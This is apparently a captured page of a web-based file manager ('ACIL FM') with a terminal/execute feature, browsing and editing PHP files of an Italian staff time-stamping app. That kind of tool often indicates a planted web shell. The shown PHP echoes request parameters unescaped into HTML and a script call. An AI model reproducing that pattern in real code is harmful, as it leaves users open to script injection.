ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/timbrature/NH-HR-test/ds/public/stamps
/
home
mhhtmff
timbrature
NH-HR-test
ds
public
stamps
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
new_stamp_content.php
3.96 MB
chmod
View
DL
Edit
Rename
Delete
stamps_calendar_content.php
962 B
chmod
View
DL
Edit
Rename
Delete
stamps_list.php
2.51 MB
chmod
View
DL
Edit
Rename
Delete
stamps_to_approve_count.php
667 B
chmod
View
DL
Edit
Rename
Delete
stamps_to_approve_list.php
2.76 MB
chmod
View
DL
Edit
Rename
Delete
stamp_details_content.php
8.62 MB
chmod
View
DL
Edit
Rename
Delete
users_list.php
1.57 MB
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/timbrature/NH-HR-test/ds/public/stamps/new_stamp_content.php
<?php session_start(); if (!isset($_SESSION['loggedin'])) { exit("unauthorized"); } include "../../php/database.php"; $user_id = $_GET["user_id"]; $date = $_GET["date"]; ?> <div class="modal-header"> <h5 class="modal-title" id="exampleModalLabel">Nuova timbratura</h5> <button class="close" type="button" data-dismiss="modal" aria-label="Close"><span aria-hidden="true" id="close_new_stamp">×</span></button> </div> <div class="modal-body"> <form> <fieldset class="form-group"> <div class="row"> <label class="col-sm-3 col-form-label" for="inputEmail3">Tipo</label> <div class="col-sm-9"> <div class="form-check"> <input class='form-check-input' id='new_stamp_type_entry' type='radio' name='gridRadios' value='option1' checked='checked'> <label class="form-check-label ml-3" for="stamp_type_entry"> Entrata </label> </div> <div class="form-check"> <input class='form-check-input' id='new_stamp_type_exit' type='radio' name='gridRadios' value='option2'> <label class="form-check-label ml-3" for="stamp_type_exit"> Uscita </label> </div> </div> </div> </fieldset> <div class="form-group row"> <label class="col-sm-3 col-form-label" for="inputEmail3">Trasferta</label> <div class="col-sm-9"> <div class="form-check"> <input class='form-check-input' id='new_stamp_transfert' type='checkbox' onclick='changeNewStampTransfertType()'> <label class="form-check-label ml-3" for="gridCheck1"> Timbratura effettuata in trasferta </label> </div> </div> </div> <div class='form-group row' id='stamp_transfer_location_container' style='display: none;'> <div class="col-sm-3">Luogo timbratura</div> <div class="col-sm-9"> <select class="form-control form-control-rounded" id="new_stamp_transfer_location"> <option value='Italia' selected>Italia</option> <option value='Estero'>Estero</option> </select> </div> </div> <div class="form-group row"> <label class="col-sm-3 col-form-label" for="inputEmail3">Data</label> <div class="col-sm-9"> <?php if($date != "") { ?><input class="form-control" id="new_stamp_date" type="date" placeholder="Data" value="<?php echo $date; ?>"><?php } else { ?><input class="form-control" id="new_stamp_date" type="date" placeholder="Data" value="<?php echo date("Y-m-d"); ?>"><?php } ?> </div> </div> <div class="form-group row"> <label class="col-sm-3 col-form-label" for="inputEmail3">Ora</label> <div class="col-sm-9"> <input class="form-control" id="new_stamp_time" type="time" placeholder="Ora" value="<?php echo date("H:i"); ?>"> </div> </div> <div class="form-group row"> <label class="col-sm-3 col-form-label" for="inputEmail3">Note</label> <div class="col-sm-9"> <textarea class="form-control" id="new_stamp_note" placeholder="Note"></textarea> </div> </div> </form> </div> <div class="modal-footer"> <button class="btn btn-secondary" type="button" data-dismiss="modal">Chiudi</button> <button class='btn btn-primary ml-2' type='button' onclick='CreateNewStamp(<?php echo $user_id; ?>)'>Inserisci</button> </div>
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply